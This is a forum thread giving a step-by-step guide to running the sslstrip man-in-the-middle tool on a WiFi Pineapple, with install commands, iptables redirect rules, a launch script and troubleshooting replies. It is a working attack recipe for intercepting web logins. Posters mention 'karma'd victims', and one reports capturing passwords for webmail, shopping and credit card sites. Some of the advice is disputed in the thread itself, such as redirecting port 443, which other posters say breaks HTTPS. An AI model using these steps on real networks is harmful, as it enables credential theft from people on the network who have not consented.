Jump to content

Full Sslstrip Guide


telot

Recommended Posts

Ok - theres never been a straight up "How to get sslstrip working" thread - theres quite a few bits and pieces and theres always WM's module...but people still seem to be confused. I am to put a stop to this via this here guide.

1. Install sslstrip:

opkg update

opkg install --dest usb sslstrip

Note: I install everything to my usb. If you don't have a USB drive, then the command will look like this: opkg install sslstrip (herpaderp)

2. One time configuration of sslstrip:

A HUGE thanks to Vulture for laying this out for us:

ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7

touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py

3. iptables configuration - must be run each and every time the pineapple reboots BEFORE you want to run sslstrip.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

4. run sslstrip!

sslstrip -w /usb/sslstrip.log &

Done! sslstrip is now running in the background! I usually combo this with a little tcpdump - that way you've got every plaintext and ssl'd packet! Hope you all enjoy

telot

Link to comment
Share on other sites

Thanks for the write-up Telot. Just wish I saw this guide before I installed the module via the UI. I think the sslstrip is what caused my mkiv to brick. I wasn't able to ssh into it and the web ui was unresponsive. I hit the reset button and now the WPS light is blinking constantly. I hope this will remedy the issue, but can't check it out till i get my TTL cable to do a clean flash.

Edited by BigFanOHak5
Link to comment
Share on other sites

Hi Telot

Why would this be necessary? This is ssl traffic and can't be decrypted:

iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

Also I am having a problem with direction

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

It seems that only the traffic from browsing the pineapples interface gets redirected to port 10000, not the traffic going through the router.

Unfortunately I don't know enough about IP tables to fix this problem.

Any help would be appreciated.

Finally I noticed that compiling the latest version of sslstrip works fine and I am wondering why version 6 is still being used?

Thanks for the write-up Telot. Just wish I saw this guide before I installed the module via the UI. I think the sslstrip is what caused my mkiv to brick. I wasn't able to ssh into it and the web ui was unresponsive. I hit the reset button and now the WPS light is blinking constantly. I hope this will remedy the issue, but can't check it out till i get my TTL cable to do a clean flash.

Link to comment
Share on other sites

Hi Telot

Why would this be necessary? This is ssl traffic and can't be decrypted:

iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

lol... that's the point of sslstrip. It decrypts SSL and re-packages it.

Here's more info on it:

http://www.sindark.com/2009/02/21/the-ssl-strip-exploit/

Edited by legion
Link to comment
Share on other sites

I get this when I try to run it:

root@Pineapple:/www# sslstrip -w /usb/test

Traceback (most recent call last):

File "/usb/usr/bin/sslstrip", line 27, in <module>

from twisted.web import http

File "/usb/usr/lib/python2.7/site-packages/twisted/web/http.py", line 36, in <module>

from twisted.internet import interfaces, reactor, protocol, address, task

File "/usb/usr/lib/python2.7/site-packages/twisted/internet/reactor.py", line 11, in <module>

from twisted.internet import selectreactor

File "/usb/usr/lib/python2.7/site-packages/twisted/internet/selectreactor.py", line 21, in <module>

from twisted.internet import error

EOFError: EOF read where object expected

dies after that

any ideas?

Link to comment
Share on other sites

I think you are mistaken, sslstrip does not decrypt anything. It is a transparent proxy that fools the client and server into thinking that they are exchanging information using encryption.

If you are going to quote a web page might as well be the author of the tool:

Moxie Marlinspike

http://www.thoughtcrime.org/software/sslstrip/

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

His site has clear details of how this works.

There is no mention of redirecting taffic from port 443 to the sslstrip port. That would not be possible because ssl traffic cannot be decrypted without a key.

From my understanding sslstrip will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links.

You can do the same thing with other transparent proxies.

lol... that's the point of sslstrip. It decrypts SSL and re-packages it.

Here's more info on it:

http://www.sindark.com/2009/02/21/the-ssl-strip-exploit/

Link to comment
Share on other sites

Hi Telot

Why would this be necessary? This is ssl traffic and can't be decrypted:

iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

Also I am having a problem with direction

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

It seems that only the traffic from browsing the pineapples interface gets redirected to port 10000, not the traffic going through the router.

Unfortunately I don't know enough about IP tables to fix this problem.

Any help would be appreciated.

Finally I noticed that compiling the latest version of sslstrip works fine and I am wondering why version 6 is still being used?

I honestly can't explain - I'm just a meager pragmatist. It works for me (for all traffic, including karma'd victims) so I thought I'd share.

telot

Link to comment
Share on other sites

talot,

Thank you for your input,

Are you saying that if you don't redirect port 443 to 10000 that sslstrip does not work? That would be very interesting.

I am trying to get sslstrip working on the pineapple without ICS and with the IP address changed to my local LAN going through a different lan router just the same as if I was running sslstrip on my laptop. But no luck so far.

I have had no problem in the past getting sslstrip to work on a regular computer.

Just wondering if IP tables has some kind of bug on this version of Linux (since I have the same problem on the stock openwrt firmware on the tplink 703 a similar router) or is it that I am ignorant about the way that routers work, and sslstrip needs to have different settings when run on a router?

Any help would be appreciated and would help to expand the different ways that the pineapple could be used as I don't see much benefit from running sslstrip when you have to connect to ICS on another computer. In that case why not just run sslstrip from that computer?

I honestly can't explain - I'm just a meager pragmatist. It works for me (for all traffic, including karma'd victims) so I thought I'd share.

telot

Link to comment
Share on other sites

Interesting :) My module does not redirect the 443 to 10000, only the 80 and beta testers reported it as working.

TBH WM, I was unable to get sslstrip working with just your module + opkg install --dest usb sslstrip - I noticed that you just redirect 80, and then I saw in another thread someone else redirected 443 (ssl port) as well and it worked. That is how I drew the conclusion that could be the problem. I love your modules, but for stuff like tcpdump and sslstrip I like to bind it to the WPS button (using your button module of course!) that way I can start up my sniffing right when I power up the pineapple. I may be totally wrong on the 442 dealio, but it works, so whose complaining? :)

telot

Link to comment
Share on other sites

TBH WM, I was unable to get sslstrip working with just your module + opkg install --dest usb sslstrip - I noticed that you just redirect 80, and then I saw in another thread someone else redirected 443 (ssl port) as well and it worked. That is how I drew the conclusion that could be the problem.

I will add the port 443 in the next version, just in case :P

I love your modules, but for stuff like tcpdump and sslstrip I like to bind it to the WPS button (using your button module of course!) that way I can start up my sniffing right when I power up the pineapple. I may be totally wrong on the 442 dealio, but it works, so whose complaining? :)

telot

I will see how I can add the possibility to start modules from the Button module. :)

Edited by Whistle Master
Link to comment
Share on other sites

I will add the port 443 in the next version, just in case :P

This is a mistake.

It doesn't make sense to pass encrypted packets to sslstrip's HTTP server which expects unencrypted traffic. The sslstrip manual makes no mention of such an iptables redirection for a reason.

I just downloaded the module on my fresh Pineapple and clients on the network were no longer able to access actual HTTPS websites. I had to comment the line out and everything worked as it should again.

Link to comment
Share on other sites

  • 2 weeks later...

This is a mistake.

It doesn't make sense to pass encrypted packets to sslstrip's HTTP server which expects unencrypted traffic. The sslstrip manual makes no mention of such an iptables redirection for a reason.

I just downloaded the module on my fresh Pineapple and clients on the network were no longer able to access actual HTTPS websites. I had to comment the line out and everything worked as it should again.

Followed your guide, but when I get to this step: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

It booted me from the webui and now when I try to get back to the webui, I get problem loading page error. thoughts?

Edited by BigFanOHak5
Link to comment
Share on other sites

Followed your guide, but when I get to this step: iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

It booted me from the webui and now when I try to get back to the webui, I get problem loading page error. thoughts?

You could wait a little bit and you will gain access to the webui or you could go to the shell and type : iptables -t nat -D PREROUTING 1 ......... then you will get the webui back.

Link to comment
Share on other sites

  • 2 weeks later...

Here is a script that will run the iptables command and launch sslstrip with the date and time as the logfile in /usb. It works when running it from a SSH terminal but for some reason it doesn't seem to work from the WPS button script.


#!/bin/sh
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
_now=$(date +"%Y%m%d-%H%M%S")
_file="/usb/sslstrip_$_now.log"
sslstrip -w $_file
[/CODE]

Link to comment
Share on other sites

  • 3 weeks later...

my thoughts after trying different suggestions:

I'm using MkIV with 2.5. Connected via ethernet to laptop running Backtrack5r2. Installed sslstrip via command line to usb. tried running sslstrip via command line with different options.

My results are

1. needed to edit /etc/sysctl.conf file as suggested in another post.

2. you need to forward both 80 and 443. Otherwise either http or https pages hang on loading while the other loads ok. Both seem to be neede for seemless browsing.

3. fix port forwarding after done with sslstrip.

4. had best results with running -k -p switches.

I'll post how it goes with relay configuration with Alfa card next.

Edited by 7ncubane
Link to comment
Share on other sites

Sorry for 2 postings in a row.

I've been playing with sslstrip and noticed something.

I was able to sniff my passwords on yahoo mail, gmail, amazon, capital one credit card, and twitter. However, when I tried Chase, Wells Fargo, and Charles Schwab, sign in pages would not even load. The the browser just got "stuck".

It seems that sslstrip passes through http traffic ok and processes regular https traffic ok, but seems to be not able to process certain https sites. Anybody have similar experience? Any idea what this "non-standard https/ssl traffic might be?

Link to comment
Share on other sites

thanks for input.

I can run karma and sslstrip at the same time. sslstrip on usb, set up with swap space. Make sure to use powered usb hub. I use separate power source for the hub and pineapple.

Next question is, can you run urlsnarf with sslstrip? How can I set up the iptables? sslstrip needs packets routed to port 10000 but url snarf need packets directly from port 80. (I think.)

Link to comment
Share on other sites

thanks for input.

I can run karma and sslstrip at the same time. sslstrip on usb, set up with swap space. Make sure to use powered usb hub. I use separate power source for the hub and pineapple.

Next question is, can you run urlsnarf with sslstrip? How can I set up the iptables? sslstrip needs packets routed to port 10000 but url snarf need packets directly from port 80. (I think.)

urlsnarf does not need iptable set up it just listens on port 80

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...